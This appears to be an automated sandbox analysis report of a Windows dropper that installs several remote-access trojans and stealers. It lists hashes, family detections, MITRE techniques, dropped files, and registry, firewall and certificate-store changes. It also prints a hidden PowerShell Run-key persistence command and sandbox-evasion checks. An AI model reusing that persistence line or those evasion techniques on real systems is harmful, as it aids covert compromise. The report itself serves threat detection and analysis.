ammyyadmin | 2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce

Analysis

max time kernel
59s
max time network
418s
platform
windows11-21h2_x64
resource
win11-20231222-en
resource tags

arch:x64arch:x86image:win11-20231222-enlocale:en-usos:windows11-21h2-x64system
submitted
29-01-2024 12:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4363463463464363463463463.exe
Size

10KB
MD5

2a94f3960c58c6e70826495f76d00b85
SHA1

e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
SHA256

2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
SHA512

fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
SSDEEP

192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Score

10^/10

ammyyadmin redline tofsee xworm zgrat discovery evasion infostealer persistence rat spyware stealer themida trojan

Malware Config

Signatures

Ammyy Admin
Remote admin tool with various capabilities.
rat ammyyadmin

AmmyyAdmin payload 1 IoCs

resource	yara_rule
behavioral4/files/0x000100000002adb6-9217.dat	family_ammyyadmin

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral4/files/0x000200000002a947-5036.dat	family_xworm
behavioral4/files/0x000500000002adc8-9294.dat	family_xworm

Detect ZGRat V1 38 IoCs

resource	yara_rule
behavioral4/files/0x000d00000000e63c-92.dat	family_zgrat_v1
behavioral4/files/0x000d00000000e63c-98.dat	family_zgrat_v1
behavioral4/memory/1152-99-0x0000000000E60000-0x0000000001364000-memory.dmp	family_zgrat_v1
behavioral4/files/0x000d00000000e63c-97.dat	family_zgrat_v1
behavioral4/files/0x000100000002a7f3-146.dat	family_zgrat_v1
behavioral4/memory/3048-174-0x0000000005310000-0x0000000005407000-memory.dmp	family_zgrat_v1
behavioral4/memory/3048-176-0x0000000005310000-0x0000000005407000-memory.dmp	family_zgrat_v1
behavioral4/memory/3048-182-0x0000000005310000-0x0000000005407000-memory.dmp	family_zgrat_v1
behavioral4/memory/3048-188-0x0000000005310000-0x0000000005407000-memory.dmp	family_zgrat_v1
behavioral4/memory/3048-193-0x0000000005310000-0x0000000005407000-memory.dmp	family_zgrat_v1
behavioral4/memory/3048-197-0x0000000005310000-0x0000000005407000-memory.dmp	family_zgrat_v1
behavioral4/memory/3048-199-0x0000000005310000-0x0000000005407000-memory.dmp	family_zgrat_v1
behavioral4/memory/3048-203-0x0000000005310000-0x0000000005407000-memory.dmp	family_zgrat_v1
behavioral4/memory/3048-205-0x0000000005310000-0x0000000005407000-memory.dmp	family_zgrat_v1
behavioral4/memory/3048-208-0x0000000005310000-0x0000000005407000-memory.dmp	family_zgrat_v1
behavioral4/memory/3048-210-0x0000000005310000-0x0000000005407000-memory.dmp	family_zgrat_v1
behavioral4/memory/3048-212-0x0000000005310000-0x0000000005407000-memory.dmp	family_zgrat_v1
behavioral4/memory/3048-218-0x0000000005310000-0x0000000005407000-memory.dmp	family_zgrat_v1
behavioral4/memory/3048-222-0x0000000005310000-0x0000000005407000-memory.dmp	family_zgrat_v1
behavioral4/memory/3048-230-0x0000000005310000-0x0000000005407000-memory.dmp	family_zgrat_v1
behavioral4/memory/3048-232-0x0000000005310000-0x0000000005407000-memory.dmp	family_zgrat_v1
behavioral4/memory/3048-228-0x0000000005310000-0x0000000005407000-memory.dmp	family_zgrat_v1
behavioral4/memory/3048-226-0x0000000005310000-0x0000000005407000-memory.dmp	family_zgrat_v1
behavioral4/memory/3048-224-0x0000000005310000-0x0000000005407000-memory.dmp	family_zgrat_v1
behavioral4/memory/3048-220-0x0000000005310000-0x0000000005407000-memory.dmp	family_zgrat_v1
behavioral4/memory/3048-216-0x0000000005310000-0x0000000005407000-memory.dmp	family_zgrat_v1
behavioral4/memory/3048-214-0x0000000005310000-0x0000000005407000-memory.dmp	family_zgrat_v1
behavioral4/memory/3048-201-0x0000000005310000-0x0000000005407000-memory.dmp	family_zgrat_v1
behavioral4/memory/3048-195-0x0000000005310000-0x0000000005407000-memory.dmp	family_zgrat_v1
behavioral4/memory/3048-190-0x0000000005310000-0x0000000005407000-memory.dmp	family_zgrat_v1
behavioral4/memory/3048-184-0x0000000005310000-0x0000000005407000-memory.dmp	family_zgrat_v1
behavioral4/memory/3048-180-0x0000000005310000-0x0000000005407000-memory.dmp	family_zgrat_v1
behavioral4/memory/3048-178-0x0000000005310000-0x0000000005407000-memory.dmp	family_zgrat_v1
behavioral4/memory/3048-171-0x0000000005310000-0x0000000005407000-memory.dmp	family_zgrat_v1
behavioral4/memory/3048-169-0x0000000005310000-0x0000000005407000-memory.dmp	family_zgrat_v1
behavioral4/memory/3048-167-0x0000000005310000-0x000000000540E000-memory.dmp	family_zgrat_v1
behavioral4/files/0x000100000002a7f3-145.dat	family_zgrat_v1
behavioral4/files/0x000300000002a977-3883.dat	family_zgrat_v1

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

resource	yara_rule
behavioral4/files/0x0002000000025cb3-2801.dat	family_redline
behavioral4/files/0x000400000002a98c-5397.dat	family_redline

Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	gate3_64.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	FSNYphJRvLB_VXg0vJsInz9P.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
129	3132	powershell.exe

Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003
Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
5448	netsh.exe
5444	netsh.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	gate3_64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	gate3_64.exe

Executes dropped EXE 35 IoCs

pid	Process
1668	april.exe
4868	april.tmp
2764	mpveasyplayer.exe
2412	mpveasyplayer.exe
1152	ma.exe
1952	socks5-clean.exe
4912	.exe
3048	hncc.exe
1852	csaff.exe
904	Update.exe
3596	CoinSurf.WPF.exe
4240	csen.exe
1860	CoinSurf.WPF.exe
4336	Update.exe
2060	CoinSurf.WPF.exe
2128	csen.exe
3044	asdfg.exe
1304	cb0e88abe7aee128ff8635e44df9797d0224aff000d03fc5d9166e575b50f4a1.exe
5020	ghjkl.exe
4392	gate3_64.exe
3284	dvchost.exe
4076	Nhnsunywskn.exe
1376	Conhost.exe
280	Conhost.exe
484	BroomSetup.exe
2040	nsa1F6C.tmp
5388	FSNYphJRvLB_VXg0vJsInz9P.exe
5400	qzGKrtt13iMr8gy3nfRk1fW6.exe
5328	zYQ6hW3bnk5Dp2s5DhG1cOXh.exe
5664	j3948XxyYzR9RquUXSxrEBKz.exe
5684	7z.exe
6124	AMBZXl8CKqMuSCh42eIpHYa4.exe
3184	YJqDtomoOy9uxqtlxYh1Udx0.exe
4972	COf9ITNCFe18e9mYwVRco9Y3.exe
4704	cmd.exe

Identifies Wine through registry keys 2 TTPs 1 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1184116928-951304463-2249875399-1000\Software\Wine	FSNYphJRvLB_VXg0vJsInz9P.exe

Loads dropped DLL 64 IoCs

pid	Process
4868	april.tmp
4868	april.tmp
4868	april.tmp
3596	CoinSurf.WPF.exe
3596	CoinSurf.WPF.exe
3596	CoinSurf.WPF.exe
3596	CoinSurf.WPF.exe
3596	CoinSurf.WPF.exe
3596	CoinSurf.WPF.exe
3596	CoinSurf.WPF.exe
3596	CoinSurf.WPF.exe
3596	CoinSurf.WPF.exe
3596	CoinSurf.WPF.exe
3596	CoinSurf.WPF.exe
3596	CoinSurf.WPF.exe
3596	CoinSurf.WPF.exe
3596	CoinSurf.WPF.exe
3596	CoinSurf.WPF.exe
3596	CoinSurf.WPF.exe
3596	CoinSurf.WPF.exe
3596	CoinSurf.WPF.exe
3596	CoinSurf.WPF.exe
3596	CoinSurf.WPF.exe
3596	CoinSurf.WPF.exe
3596	CoinSurf.WPF.exe
3596	CoinSurf.WPF.exe
3596	CoinSurf.WPF.exe
3596	CoinSurf.WPF.exe
3596	CoinSurf.WPF.exe
3596	CoinSurf.WPF.exe
3596	CoinSurf.WPF.exe
3596	CoinSurf.WPF.exe
3596	CoinSurf.WPF.exe
3596	CoinSurf.WPF.exe
3596	CoinSurf.WPF.exe
3596	CoinSurf.WPF.exe
1860	CoinSurf.WPF.exe
1860	CoinSurf.WPF.exe
1860	CoinSurf.WPF.exe
1860	CoinSurf.WPF.exe
1860	CoinSurf.WPF.exe
1860	CoinSurf.WPF.exe
1860	CoinSurf.WPF.exe
1860	CoinSurf.WPF.exe
1860	CoinSurf.WPF.exe
1860	CoinSurf.WPF.exe
2060	CoinSurf.WPF.exe
2060	CoinSurf.WPF.exe
2060	CoinSurf.WPF.exe
2060	CoinSurf.WPF.exe
2060	CoinSurf.WPF.exe
2060	CoinSurf.WPF.exe
2060	CoinSurf.WPF.exe
2060	CoinSurf.WPF.exe
2060	CoinSurf.WPF.exe
2060	CoinSurf.WPF.exe
2060	CoinSurf.WPF.exe
2060	CoinSurf.WPF.exe
2060	CoinSurf.WPF.exe
2060	CoinSurf.WPF.exe
2060	CoinSurf.WPF.exe
2060	CoinSurf.WPF.exe
2060	CoinSurf.WPF.exe
2060	CoinSurf.WPF.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 2 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral4/files/0x000400000002a938-1747.dat	themida
behavioral4/files/0x0002000000025cb1-2291.dat	themida

Unexpected DNS network traffic destination 1 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	141.98.234.31

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1184116928-951304463-2249875399-1000\Software\Microsoft\Windows\CurrentVersion\Run\socks_powershell = "Powershell.exe -windowstyle hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Local\\Temp\\RarSFX0\\socks5-clean.ps1\""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1184116928-951304463-2249875399-1000\Software\Microsoft\Windows\CurrentVersion\Run\CoinSurf = "C:\\Users\\Admin\\AppData\\Local\\CoinSurf\\app-1.0.5\\CoinSurf.WPF.exe"	CoinSurf.WPF.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1184116928-951304463-2249875399-1000\Software\Microsoft\Windows\CurrentVersion\Run\CoinSurf = "C:\\Users\\Admin\\AppData\\Local\\CoinSurf\\app-1.0.7\\CoinSurf.WPF.exe"	CoinSurf.WPF.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	gate3_64.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 10 IoCs

Web Service

T1102

flow	ioc
5	bitbucket.org
99	iplogger.org
238	raw.githubusercontent.com
246	bitbucket.org
1	iplogger.org
54	iplogger.org
54	bitbucket.org
54	raw.githubusercontent.com
55	iplogger.org
223	bitbucket.org

Looks up external IP address via web service 6 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
70	ipinfo.io
77	api.myip.com
78	ipinfo.io
7	ipinfo.io
54	api.myip.com
69	api.myip.com

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\GroupPolicy	gate3_64.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	gate3_64.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	gate3_64.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	gate3_64.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
4392	gate3_64.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 4912 set thread context of 4104	4912	.exe	105
PID 1376 set thread context of 3172	1376	Conhost.exe	128

Launches sc.exe 8 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2828	sc.exe
1944	sc.exe
3108	sc.exe
5540	sc.exe
3724	sc.exe
6028	sc.exe
2716	sc.exe
1508	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 12 IoCs

pid	pid_target	Process	procid_target
5632	4972	WerFault.exe	137
5824	4704	WerFault.exe	139
5984	6124	WerFault.exe	136
5920	5924	WerFault.exe	182
5604	2040	WerFault.exe	123
5896	5400	WerFault.exe	134
5320	3344	WerFault.exe	264
6000	3344	WerFault.exe	264
2256	3708	WerFault.exe	269
4560	3708	WerFault.exe	269
3816	4744	WerFault.exe	336
4552	4744	WerFault.exe	336

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	cb0e88abe7aee128ff8635e44df9797d0224aff000d03fc5d9166e575b50f4a1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	cb0e88abe7aee128ff8635e44df9797d0224aff000d03fc5d9166e575b50f4a1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	cb0e88abe7aee128ff8635e44df9797d0224aff000d03fc5d9166e575b50f4a1.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	nsa1F6C.tmp
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	nsa1F6C.tmp

Creates scheduled task(s) 1 TTPs 7 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
5648	schtasks.exe
3432	schtasks.exe
5096	schtasks.exe
5420	schtasks.exe
4548	schtasks.exe
3440	schtasks.exe
3332	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
4832	timeout.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
6116	taskkill.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	gate3_64.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	CoinSurf.WPF.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	CoinSurf.WPF.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	CoinSurf.WPF.exe

Runs net.exe

Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery

T1018

pid	Process
3588	PING.EXE
4660	PING.EXE
5692	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4868	april.tmp
4868	april.tmp
3132	powershell.exe
3132	powershell.exe
4912	.exe
904	Update.exe
904	Update.exe
3596	CoinSurf.WPF.exe
3596	CoinSurf.WPF.exe
1860	CoinSurf.WPF.exe
3596	CoinSurf.WPF.exe
3596	CoinSurf.WPF.exe
2060	CoinSurf.WPF.exe
2060	CoinSurf.WPF.exe
2324	powershell.exe
2324	powershell.exe
1304	cb0e88abe7aee128ff8635e44df9797d0224aff000d03fc5d9166e575b50f4a1.exe
1304	cb0e88abe7aee128ff8635e44df9797d0224aff000d03fc5d9166e575b50f4a1.exe
2324	powershell.exe
3336	Process not Found
3336	Process not Found
3336	Process not Found
3336	Process not Found
3336	Process not Found
3336	Process not Found
3336	Process not Found
3336	Process not Found
3336	Process not Found
3336	Process not Found
3336	Process not Found
3336	Process not Found
3336	Process not Found
3336	Process not Found
3336	Process not Found
3336	Process not Found
3336	Process not Found
3336	Process not Found
3336	Process not Found
3336	Process not Found
3336	Process not Found
3336	Process not Found
3336	Process not Found
3336	Process not Found
3336	Process not Found
3336	Process not Found
3336	Process not Found
3336	Process not Found
3336	Process not Found
3336	Process not Found
3336	Process not Found
3336	Process not Found
3336	Process not Found
3336	Process not Found
3336	Process not Found
3336	Process not Found
3336	Process not Found
3336	Process not Found
3336	Process not Found
3336	Process not Found
3336	Process not Found
3336	Process not Found
3336	Process not Found
3336	Process not Found
3336	Process not Found

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
1304	cb0e88abe7aee128ff8635e44df9797d0224aff000d03fc5d9166e575b50f4a1.exe

Suspicious use of AdjustPrivilegeToken 38 IoCs

description	pid	Process
Token: SeDebugPrivilege	4988	4363463463464363463463463.exe
Token: SeDebugPrivilege	1152	ma.exe
Token: SeDebugPrivilege	3132	powershell.exe
Token: SeDebugPrivilege	4912	.exe
Token: SeDebugPrivilege	3048	hncc.exe
Token: SeDebugPrivilege	3596	CoinSurf.WPF.exe
Token: SeDebugPrivilege	1860	CoinSurf.WPF.exe
Token: SeLockMemoryPrivilege	4104	vbc.exe
Token: SeLockMemoryPrivilege	4104	vbc.exe
Token: SeDebugPrivilege	2060	CoinSurf.WPF.exe
Token: SeDebugPrivilege	3044	asdfg.exe
Token: SeDebugPrivilege	2324	powershell.exe
Token: SeDebugPrivilege	5020	ghjkl.exe
Token: SeDebugPrivilege	4076	Nhnsunywskn.exe
Token: SeShutdownPrivilege	3336	Process not Found
Token: SeCreatePagefilePrivilege	3336	Process not Found
Token: SeShutdownPrivilege	3336	Process not Found
Token: SeCreatePagefilePrivilege	3336	Process not Found
Token: SeShutdownPrivilege	3336	Process not Found
Token: SeCreatePagefilePrivilege	3336	Process not Found
Token: SeShutdownPrivilege	3336	Process not Found
Token: SeCreatePagefilePrivilege	3336	Process not Found
Token: SeShutdownPrivilege	3336	Process not Found
Token: SeCreatePagefilePrivilege	3336	Process not Found
Token: SeShutdownPrivilege	3336	Process not Found
Token: SeCreatePagefilePrivilege	3336	Process not Found
Token: SeShutdownPrivilege	3336	Process not Found
Token: SeCreatePagefilePrivilege	3336	Process not Found
Token: SeShutdownPrivilege	3336	Process not Found
Token: SeCreatePagefilePrivilege	3336	Process not Found
Token: SeShutdownPrivilege	3336	Process not Found
Token: SeCreatePagefilePrivilege	3336	Process not Found
Token: SeShutdownPrivilege	3336	Process not Found
Token: SeCreatePagefilePrivilege	3336	Process not Found
Token: SeShutdownPrivilege	3336	Process not Found
Token: SeCreatePagefilePrivilege	3336	Process not Found
Token: SeRestorePrivilege	5684	7z.exe
Token: 35	5684	7z.exe

Suspicious use of FindShellTrayWindow 9 IoCs

pid	Process
4868	april.tmp
904	Update.exe
3596	CoinSurf.WPF.exe
3596	CoinSurf.WPF.exe
3596	CoinSurf.WPF.exe
4104	vbc.exe
2060	CoinSurf.WPF.exe
2060	CoinSurf.WPF.exe
2060	CoinSurf.WPF.exe

Suspicious use of SendNotifyMessage 6 IoCs

pid	Process
3596	CoinSurf.WPF.exe
3596	CoinSurf.WPF.exe
3596	CoinSurf.WPF.exe
2060	CoinSurf.WPF.exe
2060	CoinSurf.WPF.exe
2060	CoinSurf.WPF.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
484	BroomSetup.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4988 wrote to memory of 1668	4988	4363463463464363463463463.exe	80
PID 4988 wrote to memory of 1668	4988	4363463463464363463463463.exe	80
PID 4988 wrote to memory of 1668	4988	4363463463464363463463463.exe	80
PID 1668 wrote to memory of 4868	1668	april.exe	81
PID 1668 wrote to memory of 4868	1668	april.exe	81
PID 1668 wrote to memory of 4868	1668	april.exe	81
PID 4868 wrote to memory of 2764	4868	april.tmp	82
PID 4868 wrote to memory of 2764	4868	april.tmp	82
PID 4868 wrote to memory of 2764	4868	april.tmp	82
PID 4868 wrote to memory of 2412	4868	april.tmp	83
PID 4868 wrote to memory of 2412	4868	april.tmp	83
PID 4868 wrote to memory of 2412	4868	april.tmp	83
PID 4988 wrote to memory of 1152	4988	4363463463464363463463463.exe	84
PID 4988 wrote to memory of 1152	4988	4363463463464363463463463.exe	84
PID 1152 wrote to memory of 2620	1152	ma.exe	86
PID 1152 wrote to memory of 2620	1152	ma.exe	86
PID 2620 wrote to memory of 4832	2620	cmd.exe	87
PID 2620 wrote to memory of 4832	2620	cmd.exe	87
PID 4988 wrote to memory of 1952	4988	4363463463464363463463463.exe	88
PID 4988 wrote to memory of 1952	4988	4363463463464363463463463.exe	88
PID 4988 wrote to memory of 1952	4988	4363463463464363463463463.exe	88
PID 1952 wrote to memory of 3132	1952	socks5-clean.exe	90
PID 1952 wrote to memory of 3132	1952	socks5-clean.exe	90
PID 1952 wrote to memory of 3132	1952	socks5-clean.exe	90
PID 2620 wrote to memory of 4912	2620	cmd.exe	91
PID 2620 wrote to memory of 4912	2620	cmd.exe	91
PID 4988 wrote to memory of 3048	4988	4363463463464363463463463.exe	98
PID 4988 wrote to memory of 3048	4988	4363463463464363463463463.exe	98
PID 4988 wrote to memory of 3048	4988	4363463463464363463463463.exe	98
PID 4912 wrote to memory of 1904	4912	.exe	97
PID 4912 wrote to memory of 1904	4912	.exe	97
PID 1904 wrote to memory of 5096	1904	cmd.exe	93
PID 1904 wrote to memory of 5096	1904	cmd.exe	93
PID 4988 wrote to memory of 1852	4988	4363463463464363463463463.exe	95
PID 4988 wrote to memory of 1852	4988	4363463463464363463463463.exe	95
